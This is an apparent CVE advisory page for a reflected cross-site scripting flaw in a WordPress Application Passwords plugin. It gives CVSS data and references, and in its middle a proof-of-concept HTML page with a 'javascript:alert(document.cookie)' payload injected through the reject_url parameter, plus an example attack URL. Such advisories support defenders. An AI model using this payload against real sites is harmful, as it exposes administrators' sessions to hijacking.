Security Vulnerability Report
CVE-2025-13308 CVSS 5.4 MEDIUM

CVE-2025-13308

Published: 2025-12-06 06:15:51
Last Modified: 2026-04-15 00:35:42

Description

The Application Passwords plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'reject_url' parameter in all versions up to, and including, 0.1.3. This is due to insufficient input sanitization and output escaping on user supplied URLs, which allows javascript: URI schemes to be embedded in the reject_url parameter. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute when a user clicks the "No, I do not approve of this connection" button, granted they can successfully trick the victim into performing an action such as clicking on a link.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Application Passwords plugin <= 0.1.3 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CVE-2025-13308 PoC - Reflected XSS in WordPress Application Passwords Plugin -->
<!-- Target: WordPress site with Application Passwords plugin <= 0.1.3 -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-13308 PoC</title>
</head>
<body>
  <h2>CVE-2025-13308 - Reflected XSS PoC</h2>
  <p>Click the link below to trigger the XSS vulnerability:</p>
  <!-- Malicious URL construction -->
  <a id="malicious-link" href="#" target="_blank">Malicious Link</a>
  <script>
    // Construct the malicious URL
    // The vulnerable parameter is 'reject_url' in the Application Passwords flow
    const targetBase = window.location.origin + '/wp-admin/admin.php?page=application-passwords';
    const maliciousPayload = 'javascript:alert(document.cookie)//';
    const maliciousUrl = targetBase + '&reject_url=' + encodeURIComponent(maliciousPayload);
    document.getElementById('malicious-link').href = maliciousUrl;
    document.getElementById('malicious-link').textContent = maliciousUrl;
    console.log('PoC URL:', maliciousUrl);
  </script>
  <h3>Attack Scenario:</h3>
  <ol>
    <li>Attacker crafts a URL with javascript: payload in reject_url parameter</li>
    <li>Victim is tricked into clicking the malicious link</li>
    <li>Victim clicks "No, I do not approve of this connection" button</li>
    <li>Malicious JavaScript executes in victim's browser context</li>
  </ol>
  <h3>Real-world Attack URL Format:</h3>
  <pre id="real-url"></pre>
  <script>
    // Display example real attack URL
    const exampleUrl = 'https://target-wordpress-site.com/wp-admin/admin.php?page=application-passwords&reject_url=javascript:alert(document.cookie)';
    document.getElementById('real-url').textContent = exampleUrl;
  </script>
</body>
</html>

References

https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/auth-app.js#L61
https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/class.application-passwords.php#L418
https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/class.application-passwords.php#L432
https://www.wordfence.com/threat-intel/vulnerabilities/id/59fdfdf3-e9fe-44d2-82f4-7a612a51d376?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13308",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-06T06:15:51.240",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Application Passwords plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'reject_url' parameter in all versions up to, and including, 0.1.3. This is due to insufficient input sanitization and output escaping on user supplied URLs, which allows javascript: URI schemes to be embedded in the reject_url parameter. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute when a user clicks the \"No, I do not approve of this connection\" button, granted they can successfully trick the victim into performing an action such as clicking on a link."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/auth-app.js#L61", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/class.application-passwords.php#L418", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/class.application-passwords.php#L432", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/59fdfdf3-e9fe-44d2-82f4-7a612a51d376?source=cve", "source": "[email protected]"}
    ]
  }
}